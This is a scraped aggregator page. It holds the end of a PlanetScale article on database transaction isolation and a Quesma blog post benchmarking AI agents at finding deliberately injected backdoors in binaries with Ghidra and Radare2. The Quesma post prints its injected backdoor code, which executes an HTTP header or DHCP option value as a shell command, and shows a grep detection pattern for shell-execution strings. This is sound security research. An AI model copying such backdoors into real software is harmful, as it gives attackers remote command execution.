* The trans­ac­tion com­mits, mak­ing the up­date vis­i­ble to the broader data­base

But now we have two ver­sions of the row with ID = 4. Ummm… that’s odd! The key here is xmin and xmax.

xmin stores the ID of the trans­ac­tion that cre­ated a row ver­sion, and xmax is the ID of the trans­ac­tion that caused a re­place­ment row to be cre­ated. Postgres uses these to de­ter­mine which row ver­sion each trans­ac­tion sees.

Let’s look at Session A again, but this time with an ad­di­tional Session B run­ning si­mul­ta­ne­ously. Press play ses­sions” again.

Before the com­mit, Session B could not see Session A’s mod­i­fi­ca­tion. It sees the name as liz” while Session A sees aly” within the trans­ac­tion. At this stage, it has noth­ing to do with xmin and xmax, but rather be­cause other trans­ac­tions can­not see un­com­mit­ted data. After Session A com­mits, Session B can now see the new name of aly” be­cause the data is com­mit­ted and the trans­ac­tion ID is greater than 10.

If the trans­ac­tion in­stead gets a roll­back, those row changes do not get ap­plied, leav­ing the data­base in a state as if the trans­ac­tion never be­gan in the first place.

This is a sim­ple sce­nario. Only one of the trans­ac­tions mod­i­fies data. Session B only does se­lect state­ments! When both si­mul­ta­ne­ously mod­ify data, each one will be able to see” the mod­i­fi­ca­tions it made, but these changes won’t bleed out into other trans­ac­tions un­til com­mit. Here’s an ex­am­ple where each trans­ac­tion se­lects data, up­dates data, se­lects again, com­mits, and fi­nally both do a fi­nal se­lect.

The con­cur­rent trans­ac­tions can­not see each oth­er’s changes un­til the data is com­mit­ted. The same mech­a­nisms are used to con­trol data vis­i­bil­ity when there are hun­dreds of si­mul­ta­ne­ous trans­ac­tions on busy Postgres data­bases.

Before we move on to MySQL, one more im­por­tant note. What hap­pens to all those du­pli­cated rows? Over time, we can end up with thou­sands of du­pli­cate rows that are no longer needed. There are sev­eral things Postgres does to mit­i­gate this is­sue, but I’ll fo­cus on the VACUUM FULL com­mand. When run, this purges ver­sions of rows that are so old that we know no trans­ac­tions will need them go­ing for­ward. It com­pacts the table in the process. Try it out be­low.

Notice that when the vac­uum full com­mand ex­e­cutes, all un­used rows are elim­i­nated, and the gaps in the table are com­pressed, re­claim­ing the un­used space.

MySQL achieves the con­sis­tent read be­hav­ior us­ing a dif­fer­ent ap­proach. Instead of keep­ing many copies of each row, MySQL im­me­di­ately over­writes old row data with new row data when mod­i­fied. This means it re­quires less main­te­nance over time for the rows (in other words, we don’t need to do vac­u­um­ing like Postgres).

However, MySQL still needs the abil­ity to show dif­fer­ent ver­sions of a row to dif­fer­ent trans­ac­tions. For this, MySQL uses an undo log — a log of re­cently-made row mod­i­fi­ca­tions, al­low­ing a trans­ac­tion to re­con­struct past ver­sions on-the-fly.

Notice how each MySQL row has two meta­data columns (in blue). These keep track of the ID of the trans­ac­tion that up­dated the row most re­cently (xid), and a ref­er­ence to the most re­cent mod­i­fi­ca­tion in the undo log (ptr).

When there are si­mul­ta­ne­ous trans­ac­tions, trans­ac­tion A may clob­ber the ver­sion of a row that trans­ac­tion B needs to see. Transaction B can see the pre­vi­ous ver­sion(s) of the row by check­ing the undo log, which stores old val­ues so long as any run­ning trans­ac­tion may need to see it.

There can even be sev­eral undo log records in the log for the same row si­mul­ta­ne­ously. In such a case, MySQL will choose the cor­rect ver­sion based on trans­ac­tion iden­ti­fiers.

The idea of Repeatable reads is im­por­tant for data­bases, but this is just one of sev­eral iso­la­tion lev­els data­bases like MySQL and Postgres sup­port. This set­ting de­ter­mines how protected” each trans­ac­tion is from see­ing data that other si­mul­ta­ne­ous trans­ac­tions are mod­i­fy­ing. Adjusting this set­ting gives the user con­trol of the trade­off be­tween iso­la­tion and per­for­mance.

Both MySQL and Postgres have four lev­els of iso­la­tion: From strongest to weak­est, these are: Serializable, Repeatable Read, Read Committed, Read Uncommitted.

Stronger lev­els of iso­la­tion pro­vide more pro­tec­tions from data in­con­sis­tency is­sues across trans­ac­tions, but come at the cost of worse per­for­mance in some sce­nar­ios.

Serializable is the strongest. In this mode, all trans­ac­tions be­have as if they were run in a well-de­fined se­quen­tial or­der, even if in re­al­ity many ran si­mul­ta­ne­ously. This is ac­com­plished via com­plex lock­ing and wait­ing.

The other three grad­u­ally loosen the strict­ness, and can be de­scribed by the un­de­sir­able phe­nom­ena they al­low or pro­hibit.

A phan­tom read is one where a trans­ac­tion runs the same SELECT mul­ti­ple times, but sees dif­fer­ent re­sults the sec­ond time around. This is typ­i­cally due to data that was in­serted and com­mit­ted by a dif­fer­ent trans­ac­tion. The time­line be­low vi­su­al­izes such a sce­nario. The hor­i­zon­tal axis rep­re­sents time pass­ing on a data­base with two clients. Hit the ↻ but­ton to re­play the se­quence at any time.

After se­ri­al­iz­able, the next least strict iso­la­tion level is called re­peat­able read. Under the SQL stan­dard, the re­peat­able read level al­lows phan­tom reads, though in Postgres they still aren’t pos­si­ble.

These hap­pen when a trans­ac­tion reads a row, and then later re-reads the same row, find­ing changes by an­other al­ready-com­mit­ted trans­ac­tion. This is dan­ger­ous be­cause we may have al­ready made as­sump­tions about the state of our data­base, but that data has changed un­der our feet.

The read com­mit­ted iso­la­tion level, the next af­ter re­peat­able read, al­lows these and phan­tom reads to oc­cur. The trade­off is slightly bet­ter data­base trans­ac­tion per­for­mance.

The last and ar­guably worst is dirty reads. A dirty read is one where a trans­ac­tion is able to see data writ­ten by an­other trans­ac­tion run­ning si­mul­ta­ne­ously that is not yet com­mit­ted. This is re­ally bad! In most cases, we never want to see data that is un­com­mit­ted from other trans­ac­tions.

The loos­est iso­la­tion level, read un­com­mit­ted, al­lows for dirty reads and the other two de­scribed above. It is the most dan­ger­ous and also most per­for­mant mode.

The keen-eyed ob­server will no­tice that I have ig­nored a par­tic­u­lar sce­nario, quite on pur­pose, up to this mo­ment. What if two trans­ac­tions need to mod­ify the same row at the same time?

Precisely how this is han­dled de­pends on both (A) the data­base sys­tem and (B) the iso­la­tion level. To keep the dis­cus­sion sim­ple, we’ll fo­cus on how this works for the strictest (SERIALIZABLE) level in Postgres and MySQL. Yet again, the world’s two most pop­u­lar re­la­tional data­bases take very dif­fer­ent ap­proaches here.

A lock is a soft­ware mech­a­nism for giv­ing own­er­ship of a piece of data to one trans­ac­tion (or a set of trans­ac­tions). Transactions ob­tain a lock on a row when they need to own” it with­out in­ter­rup­tion. When the trans­ac­tion is fin­ished us­ing the rows, it re­leases the lock to al­low other trans­ac­tions ac­cess.

Though there are many types of locks in prac­tice, the two main ones you need to know about here are shared locks and ex­clu­sive locks.

A shared (S) lock can be ob­tained by mul­ti­ple trans­ac­tions on the same row si­mul­ta­ne­ously. Typically, trans­ac­tions will ob­tain shared locks on a row when read­ing it, be­cause mul­ti­ple trans­ac­tions can do so si­mul­ta­ne­ously safely.

An ex­clu­sive (X) lock can only be owned by one trans­ac­tion for any given row at any given time. When a trans­ac­tion re­quests an X lock, no other trans­ac­tions can have any type of lock on the row. These are used when a trans­ac­tion needs to write to a row, be­cause we don’t want two trans­ac­tions si­mul­ta­ne­ously mess­ing with col­umn val­ues!

In SERIALIZABLE mode, all trans­ac­tions must al­ways ob­tain X locks when up­dat­ing a row. Most of the time, this works fine other than the per­for­mance over­head of lock­ing. In sce­nar­ios where two trans­ac­tions are both try­ing to up­date the same row si­mul­ta­ne­ously, this can lead to dead­lock!

MySQL can de­tect dead­lock and will kill one of the in­volved trans­ac­tions to al­low the other to make progress.

Postgres han­dles write con­flicts in SERIALIZABLE mode with less lock­ing, and avoids the dead­lock is­sue com­pletely.

As trans­ac­tions read and write rows, Postgres cre­ates pred­i­cate locks, which are locks” on sets of rows spec­i­fied by a pred­i­cate. For ex­am­ple, if a trans­ac­tion up­dates all rows with IDs 10–20, it will take a lock on the pred­i­cate WHERE id BETWEEN 10 AND 20. These locks are not used to block ac­cess to rows, but rather to track which rows are be­ing used by which trans­ac­tions, and then de­tect data con­flicts on-the-fly.

Combined with multi-row ver­sion­ing, this lets Postgres use op­ti­mistic con­flict res­o­lu­tion. It never blocks trans­ac­tions while wait­ing to ac­quire a lock, but it will kill a trans­ac­tion if it de­tects that it’s vi­o­lat­ing the SERIALIZABLE guar­an­tees.

Let’s look at a sim­i­lar time­line from the MySQL ex­am­ple, but this time watch­ing Postgres’ op­ti­mistic tech­nique.

The dif­fer­ence is sub­tle vi­su­ally, but im­ple­mented in quite dif­fer­ent ways. Both Postgres and MySQL lever­age the killing of one trans­ac­tion in fa­vor of main­tain­ing SERIALIZABLE guar­an­tees. Applications must ac­count for this out­come, and have retry logic for im­por­tant trans­ac­tions.

Transactions are just one tiny cor­ner of all the amaz­ing en­gi­neer­ing that goes into data­bases, and we only scratched the sur­face! But a fun­da­men­tal un­der­stand­ing of what they are, how they work, and the guar­an­tees of the four iso­la­tion lev­els is help­ful for work­ing with data­bases more ef­fec­tively.

What es­o­teric cor­ner of data­base man­age­ment sys­tems would you like to see us cover next? Join our Discord com­mu­nity and let us know.

...

Read the original on planetscale.com »

9 222 shares, 11 trendiness

We hid backdoors in ~40MB binaries and asked AI + Ghidra to find them

We hid back­doors in ~40MB bi­na­ries and asked AI + Ghidra to find them

We hid back­doors in ~40MB bi­na­ries and asked AI + Ghidra to find them

Claude can code, but can it check bi­nary ex­e­cuta­bles?

Now on the front page of Hacker News — see the dis­cus­sion.

We al­ready did our ex­per­i­ments with us­ing NSA soft­ware to hack a clas­sic Atari game. This time we want to fo­cus on a much more prac­ti­cal task — us­ing AI agents for mal­ware de­tec­tion. We part­nered with Michał Redford” Kowalczyk, re­verse en­gi­neer­ing ex­pert from Dragon Sector, known for find­ing ma­li­cious code in Polish trains, to cre­ate a bench­mark of find­ing back­doors in bi­nary ex­e­cuta­bles, with­out ac­cess to source code.

We were sur­prised that to­day’s AI agents can de­tect some hid­den back­doors in bi­na­ries. We had­n’t ex­pected them to pos­sess such spe­cial­ized re­verse en­gi­neer­ing ca­pa­bil­i­ties.

However, this ap­proach is not ready for pro­duc­tion. Even the best model, Claude Opus 4.6, found rel­a­tively ob­vi­ous back­doors in small/​mid-size bi­na­ries only 49% of the time. Worse yet, most mod­els had a high false pos­i­tive rate — flag­ging clean bi­na­ries.

In this blog post we dis­cuss a few re­cent se­cu­rity sto­ries, ex­plain what bi­nary analy­sis is, and how we con­struct a bench­mark for AI agents. We will see when they ac­com­plish tasks and when they fail — by miss­ing ma­li­cious code or by re­port­ing false find­ings.

Just a few months ago Shai Hulud 2.0 com­pro­mised thou­sands of or­ga­ni­za­tions, in­clud­ing Fortune 500 com­pa­nies, banks, gov­ern­ments, and cool star­tups — see post­mortem by PostHog. It was a sup­ply chain at­tack for the Node Package Manager ecosys­tem, in­ject­ing ma­li­cious code steal­ing cre­den­tials.

Just a few days ago, Notepad++ shared up­dates on a hi­jack by state-spon­sored ac­tors, who re­placed le­git­i­mate bi­na­ries with in­fected ones.

Even the phys­i­cal world is at stake, in­clud­ing crit­i­cal in­fra­struc­ture. For ex­am­ple, re­searchers found hid­den ra­dios in Chinese so­lar power in­vert­ers and se­cu­rity loop­holes in elec­tric buses. Every dig­i­tal de­vice has a firmware, which is much harder to check than soft­ware we in­stall on the com­puter — and has much more di­rect im­pact. Both state and cor­po­rate ac­tors have in­cen­tive to tam­per with these.

You do not even need bad ac­tors. Network routers of­ten have hid­den ad­min pass­words baked into their firmware so the ven­dor can trou­bleshoot re­motely — but any­one who dis­cov­ers those pass­words gets the same ac­cess.

Can we use AI agents to pro­tect against such at­tacks?

In day-to-day pro­gram­ming, we work with source code. It re­lies on high-level ab­strac­tions: classes, func­tions, types, or­ga­nized into a clear file struc­ture. LLMs ex­cel here be­cause they are trained on this hu­man-read­able logic.

Compilation trans­lates high-level lan­guages (like Go or Rust) into low-level ma­chine code for a given CPU ar­chi­tec­ture (such as x86 or ARM). We get raw CPU in­struc­tions: mov­ing data be­tween reg­is­ters, adding num­bers, or jump­ing to mem­ory ad­dresses. The orig­i­nal code struc­ture, to­gether with vari­ables and func­tions names gets lost.

To make mat­ters worse, com­pil­ers ag­gres­sively op­ti­mize for speed, not read­abil­ity. They in­line func­tions (changing the call hi­er­ar­chy), un­roll loops (replacing con­cise logic with repet­i­tive blocks), and re­order in­struc­tions to keep the proces­sor busy.

Yet, a bi­nary is what users ac­tu­ally run. And for closed-source and bi­nary-dis­trib­uted soft­ware, it is all we have.

Analyzing bi­na­ries is a long and te­dious process of re­verse en­gi­neer­ing, which starts with a chain of trans­la­tions: ma­chine code → as­sem­bly → pseudo-C. Let’s see how an ex­am­ple back­door looks in those rep­re­sen­ta­tions:

Going from raw bytes to as­sem­bly is straight­for­ward, as it can be viewed with a com­mand-line tool like ob­j­dump.

Turning as­sem­bly into C is much harder — we need re­verse en­gi­neer­ing tools, such as open-source Ghidra (created by NSA) and Radare2, or com­mer­cial ones like IDA Pro and Binary Ninja.

The de­com­pil­ers try their best at mak­ing sense of the CPU in­struc­tions and gen­er­at­ing a read­able C code. But since all those high-level ab­strac­tions and vari­able names got lost dur­ing com­pi­la­tion, the out­put is far from per­fect. You see out­put full of FUN_00130550, bVar49, lo­cal_148 — names that mean noth­ing.

We ask AI agents to an­a­lyze bi­na­ries and de­ter­mine if they con­tain back­doors or ma­li­cious mod­i­fi­ca­tions.

We started with sev­eral open-source pro­jects: lighttpd (a C web server), dns­masq (a C DNS/DHCP server), Dropbear (a C SSH server), and Sozu (a Rust load bal­ancer). Then, we man­u­ally in­jected back­doors. For ex­am­ple, we hid a mech­a­nism for an at­tacker to ex­e­cute com­mands via an un­doc­u­mented HTTP header.

Important caveat: All back­doors in this bench­mark are ar­ti­fi­cially in­jected for test­ing. We do not claim these pro­jects have real vul­ner­a­bil­i­ties; they are le­git­i­mate open-source soft­ware that we mod­i­fied in con­trolled ways.

These back­doors weren’t par­tic­u­larly so­phis­ti­cated — we did­n’t try to heav­ily ob­fus­cate them or hide them in ob­scure parts of the code. They are the kind of anom­aly a skilled hu­man re­verse en­gi­neer could spot rel­a­tively eas­ily.

The agents are given a com­piled ex­e­cutable — with­out source code or de­bug sym­bols. They have ac­cess to re­verse en­gi­neer­ing tools: Ghidra, Radare2, and binu­tils. The task is to iden­tify ma­li­cious code and pin­point the start ad­dress of the func­tion con­tain­ing the back­door (e.g., 0x4a1c30). See dns­masq-back­door-de­tect-printf/​in­struc­tion.md for a typ­i­cal in­struc­tion.

A few tasks use a dif­fer­ent method­ol­ogy: we pre­sent three bi­na­ries and ask which ones con­tain back­doors, with­out ask­ing for the spe­cific lo­ca­tion — see e.g. sozu-back­door-mul­ti­ple-bi­na­ries-de­tect/​in­struc­tion.md. We ex­pected this to be a sim­pler task (it was­n’t). This ap­proach sim­u­lates sup­ply chain at­tacks, where of­ten only a sub­set of bi­na­ries are al­tered.

We in­jected a back­door into the lighttpd server that ex­e­cutes shell com­mands from an un­doc­u­mented HTTP header.

Here’s the core of the in­jected back­door — it looks for a hid­den X-Forwarded-Debug header, ex­e­cutes its con­tents as a shell com­mand via popen(), and re­turns the out­put in a re­sponse header:

gboolean li_check­_de­bug_­header(li­Con­nec­tion *con) {

liRe­quest *req = &con->mainvr->request;

GList *l;

l = li_http_­head­er_find­_­first(req->head­ers, CONST_STR_LEN(“X-Forwarded-Debug”));

if (NULL != l) {

li­Http­Header *hh = (liHttpHeader*) l->data;

char *debugIn = LI_HEADER_VALUE(hh);

FILE *fp = popen(de­bu­gIn, r”); // Execute at­tack­er’s com­mand

// … read out­put into de­bu­gOut …

pclose(fp);

li_http_­head­er_in­sert(con->mainvr->re­sponse.head­ers,

CONST_STR_LEN(“X-Request-Trace”), de­bu­gOut, strlen(de­bu­gOut));

re­turn TRUE;

For a user who down­loaded this back­doored server, it would seem like this is a le­git­i­mate pro­gram. However, an at­tacker could triv­ially ex­e­cute any com­mand by send­ing a spe­cially crafted packet.

Here’s how Claude did it:

Step 1. The model iden­ti­fied the bi­nary and its 26 shared li­braries — one of which con­tained the back­door.

Step 2. Next, it ran strings with grep pat­terns look­ing for ob­vi­ous in­di­ca­tors of a back­door:

strings bin/​lighttpd2-worker | grep -iE (shell|bash|/bin/sh|exec|system|backdoor)’

However, the com­mand did­n’t find any­thing sus­pi­cious. The model ex­panded the search to all shared li­braries, look­ing for more pat­terns (hardcoded IPs, sus­pi­cious com­mands, and cre­den­tial pat­terns). Still noth­ing ob­vi­ous.

Step 3. Claude switched strate­gies and used nm -D to list im­ported func­tions:

for f in lib/*.​so; do

nm -D $f” | grep -E ′ U (system|exec|popen)′

done

lib/​li­b­lighttpd2-shared-2.0.0.so: U popen@GLIBC_2.2.5

Claude de­tected that one of the li­braries that the server uses im­ports popen(): func­tion used to ex­e­cute shell com­mands. It im­me­di­ately alarmed the model:

Step 4. Claude in­ves­ti­gated fur­ther to de­ter­mine if the func­tion was truly ma­li­cious, us­ing the Radare2 de­com­piler for analy­sis.

It first iden­ti­fied which func­tion calls popen():

r2 -q -c aaa; axt @ sym.imp.popen’ lib/​li­b­lighttpd2-shared-2.0.0.so

The out­put of this com­mand re­vealed that a func­tion called li_check­_de­bug_­header does shell ex­e­cu­tion. (That’s the back­door we added!). The model smelled some­thing fishy:

Then us­ing Radare2’s de­com­piler, the model ex­am­ined the func­tion:

r2 -q -c aaa; s dbg.li_check­_de­bug_­header; pdc’ lib/​li­b­lighttpd2-shared-2.0.0.so

The de­com­piled pseudocode al­lowed the LLM to un­der­stand how the back­door works — it looks for an un­doc­u­mented HTTP header X-Forwarded-Debug and if it’s pre­sent ex­e­cutes an at­tacker-pro­vided com­mand. The server con­ve­niently sends the com­mand out­put back in a X-Request-Trace re­sponse header.

Step 5. Finally, Claude used Radare2 to con­firm the func­tion was­n’t dead code, check­ing cross-ref­er­ences to en­sure it was called from the main pro­gram:

r2 -q -c aaa; s 0x00015260; pd 10’ lib/​li­b­lighttpd2-shared-2.0.0.so

Now be­ing con­fi­dent that it found a real back­door, Claude re­ported those find­ings back and fin­ished the ex­plo­ration.

However, LLMs very of­ten miss even ob­vi­ous back­doors.

We took dns­masq — a widely-used DNS/DHCP server — and added an em­bar­rass­ingly ob­vi­ous back­door. We weren’t even try­ing to hide it: if DHCP op­tion 224 (undocumented, we made it up) is pre­sent in a packet, ex­e­cute its con­tents as a shell com­mand via ex­ecl(“/​bin/​sh”, sh”, -c”, buf, NULL).

The back­door we added was just 7 lines of C in DHCP packet pars­ing:

/* ex­ist­ing DHCP op­tion han­dling */

match_ven­dor_opts(opt, dae­mon->dhcp_opts);

+ if (opt = op­tion_find(mess, sz, 224, 1)) {

+ char buf[256];

+ int len = op­tion_len(opt);

+ mem­cpy(buf, op­tion_ptr(opt, 0), len);

+ buf[len] = \0;

+ ex­ecl(“/​bin/​sh”, sh”, -c”, buf, NULL);

Even the best model in our bench­mark got fooled by this task. Claude Opus 4.6 found /bin/sh in the strings out­put early on, traced it to the ex­act func­tion con­tain­ing the back­door, and saw the ex­ecl(“/​bin/​sh”, sh”, -c”, …) call. Then it sim­ply as­sumed it was nor­mal:

It ex­am­ined the func­tion, but con­cluded:

The model found the ex­act func­tion, saw the ex­act ex­ecl call with /bin/sh -c — and ra­tio­nal­ized it away as legitimate DHCP script ex­e­cu­tion.” It never checked where the com­mand string ac­tu­ally comes from (a DHCP packet from client). It then moved on to in­ves­ti­gate other func­tions and never cir­cled back.

The ex­e­cuta­bles in our bench­mark of­ten have hun­dreds or thou­sands of func­tions — while the back­doors are tiny, of­ten just a dozen lines buried deep within. Finding them re­quires strate­gic think­ing: iden­ti­fy­ing crit­i­cal paths like net­work parsers or user in­put han­dlers and ig­nor­ing the noise.

Current LLMs lack this high-level in­tu­ition. Instead of pri­or­i­tiz­ing high-risk ar­eas, they of­ten de­com­pile ran­dom func­tions or grep for ob­vi­ous key­words like sys­tem() or exec(). When sim­ple heuris­tics fail, mod­els fre­quently hal­lu­ci­nate or give up en­tirely.

This lack of fo­cus leads them down rab­bit holes. We ob­served agents fix­at­ing on le­git­i­mate li­braries — treat­ing them as sus­pi­cious anom­alies. They wasted their en­tire con­text win­dow au­dit­ing be­nign code while the ac­tual back­door re­mained un­touched in a com­pletely dif­fer­ent part of the bi­nary.

The se­cu­rity com­mu­nity is drown­ing in AI-generated noise. The curl pro­ject re­cently stopped pay­ing for bug re­ports partly be­cause of AI slop:

The vast ma­jor­ity of AI-generated er­ror re­ports sub­mit­ted to cURL are pure non­sense.

A se­cu­rity tool which gives you fake re­ports is use­less and frus­trat­ing to use. We specif­i­cally tested for this with neg­a­tive tasks — clean bi­na­ries with no back­door. We found that 28% of the time mod­els re­ported back­doors or is­sues that weren’t real. For any prac­ti­cal mal­ware de­tec­tion soft­ware, we ex­pect a false pos­i­tive rate of less than 0.001%, as most soft­ware is safe, vide false pos­i­tive para­dox.

For ex­am­ple, Gemini 3 Pro sup­pos­edly discovered” a back­door in… com­mand-line ar­gu­ment pars­ing in one of the servers:

In re­al­ity, the source code cor­rectly val­i­dates and parses the com­mand-line ar­gu­ment as a num­ber. It never at­tempts to ex­e­cute it. Several findings” that the model re­ported are com­pletely fake and miss­ing from the source code.

We re­stricted agents to open-source tools: Ghidra and Radare2. We ver­i­fied that fron­tier mod­els (including Claude Opus 4.6 and Gemini 3 Pro) achieve a 100% suc­cess rate at op­er­at­ing them — cor­rectly load­ing bi­na­ries and run­ning ba­sic com­mands.

However, these open-source de­com­pil­ers lag be­hind com­mer­cial al­ter­na­tives like IDA Pro. While they han­dle C bi­na­ries well, they have is­sues with Rust (though agents man­aged to solve some tasks), and fail com­pletely with Go ex­e­cuta­bles.

For ex­am­ple, we tried to work with Caddy, a web server writ­ten in Go, with a bi­nary weigh­ing 50MB. Radare2 loaded in 6 min­utes but pro­duced poor qual­ity code, while Ghidra not only took 40 min­utes just to load, but was not able to re­turn cor­rect data. At the same time, IDA Pro loaded in 5 min­utes, giv­ing cor­rect, us­able code, suf­fi­cient for man­ual analy­sis.

To en­sure we mea­sure agent in­tel­li­gence rather than tool qual­ity, we ex­cluded Go bi­na­ries and fo­cused mostly on C ex­e­cuta­bles (and one Rust pro­ject) where the tool­ing is re­li­able.

Can AI find back­doors in bi­na­ries? Sometimes. Claude Opus 4.6 solved 49% of tasks, while Gemini 3 Pro solved 44% and Claude Opus 4.5 solved 37%.

As of now, it is far from be­ing use­ful in prac­tice — we would need a much higher de­tec­tion rate and a much lower false pos­i­tive rate to make it a vi­able end-to-end so­lu­tion.

It works on small bi­na­ries and when it sees un­ex­pected pat­terns. At the same time, it strug­gles with larger files or when back­doors mimic le­git­i­mate ac­cess routes.

While end-to-end mal­ware de­tec­tion is not re­li­able yet, AI can make it eas­ier for de­vel­op­ers to per­form ini­tial se­cu­rity au­dits. A de­vel­oper with­out re­verse en­gi­neer­ing ex­pe­ri­ence can now get a first-pass analy­sis of a sus­pi­cious bi­nary.

A year ago, mod­els could­n’t re­li­ably op­er­ate Ghidra. Now they can per­form gen­uine re­verse en­gi­neer­ing — load­ing bi­na­ries, nav­i­gat­ing de­com­piled code, trac­ing data flow.

The whole field of work­ing with bi­na­ries be­comes ac­ces­si­ble to a much wider range of soft­ware en­gi­neers. It opens op­por­tu­ni­ties not only in se­cu­rity, but also in per­form­ing low-level op­ti­miza­tion, de­bug­ging and re­verse en­gi­neer­ing hard­ware, and port­ing code be­tween ar­chi­tec­tures.

We be­lieve that re­sults can be fur­ther im­proved with con­text en­gi­neer­ing (including proper skills or MCP) and ac­cess to com­mer­cial re­verse en­gi­neer­ing soft­ware (such as the men­tioned IDA Pro and Binary Ninja).

Once AI demon­strates the ca­pa­bil­ity to solve some tasks (as it does now), sub­se­quent mod­els usu­ally im­prove dras­ti­cally.

Moreover, we ex­pect that a lot of analy­sis will be per­formed with lo­cal mod­els, likely fine-tuned for mal­ware de­tec­tion. Security-sensitive or­ga­ni­za­tions can’t up­load pro­pri­etary bi­na­ries to cloud ser­vices. Additionally, bad ac­tors will op­ti­mize their mal­ware to evade pub­lic mod­els, ne­ces­si­tat­ing the use of pri­vate, lo­cal mod­els for ef­fec­tive de­fense.

You can check full re­sults and see the tasks at QuesmaOrg/BinaryAudit.

...

Read the original on quesma.com »

10 216 shares, 27 trendiness

My journey to the microwave alternate timeline — LessWrong

This web­site re­quires javascript to prop­erly func­tion. Consider ac­ti­vat­ing javascript to get ac­cess to all site func­tion­al­ity.

...

Read the original on www.lesswrong.com »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.